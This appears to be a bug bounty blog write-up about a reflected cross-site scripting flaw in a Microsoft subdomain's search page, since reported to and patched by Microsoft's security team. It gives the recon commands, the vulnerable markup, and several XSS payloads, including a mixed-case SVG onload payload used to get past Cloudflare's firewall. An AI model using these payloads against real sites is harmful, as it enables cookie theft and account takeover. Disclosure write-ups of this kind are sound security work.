Cloudflare Bypass leads to RXSS[Reflected-Cross Site Scripting] in Microsoft
--
Har Har Mahadev! This is Prince Roy, a security researcher, also known as royzsec. Back with another write-up about my latest finding[Cross Site Scripting] at Microsoft domain by bypassing Cloudflare. Are you curious about the whole process and my mindset for finding?
So let’s start! As usual, I use a subfinder to collect subdomains. But this time I collected subdomains from https://chaos.projectdiscovery.io/, where you can easily get updated domains. Actually, they update their list every day.
Then by HTTPX, I checked and gathered all live domains.
cat microsoftdomains.txt | httpx -mc 200 | tee microsoftlivedomains.txtThen one by one I checked every domain. I guess in the fourth or fifth domain I found this vulnerability. Actually, that domain's search functionality was vulnerable. So normally I search “Hello”.
Then I saw page view-source because if we just put payload it won’t work because without knowing the functionality, just putting payload will not work and Microsoft domains are using Cloudflare and cdnjs CDN [Content delivery network]
Source code of search function
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello">Hello</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>1 result</div>
</div>So here, “Hello” was closing via <h> tag and there was no filtration to filter the search input. Then I tried with closing </h1> and normal payloads.
</h1><script>alert(document.cookie)</script>
</h1><img src=x onerror=confirm(document.cookie)>but both times Cloudflare blocked me.
Then I tried my Brahmastra:
FUZZ</h1><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>Because of the maximum time, this payload helped me to bypass the WAF or Cloudflare in the past. When I tried this, then guess what!!
Boom!! code was injected successfully and popped up on the screen. Source code:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>">Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)></h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>By closing </h1> it helped to inject and the small and capital characters helped to bypass the firewall. Literally, I was like
After I reported it quickly and the next day, the MSRC team accepted this as a valid issue.
And they patched within one day. Again I tried to bypass this but this function is now pretty safe.
Developed code:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="">hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>
Priority: P2
Severity: Important
POC:
Impact:
- As an attacker, I can use this attack to steal the cookie of the victim which leads to ATO[Account take over]
- Disclosure of end user files, redirecting the user to some other page or site, or modifying presentation of content.
Finally, thanks for reading my small blog if you like this please share it with your friends and press the clap button for me which inspires me a lot.
Please follow my social media platforms:
Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/
Github: https://github.com/royzsec
Twitter: https://twitter.com/royzsec
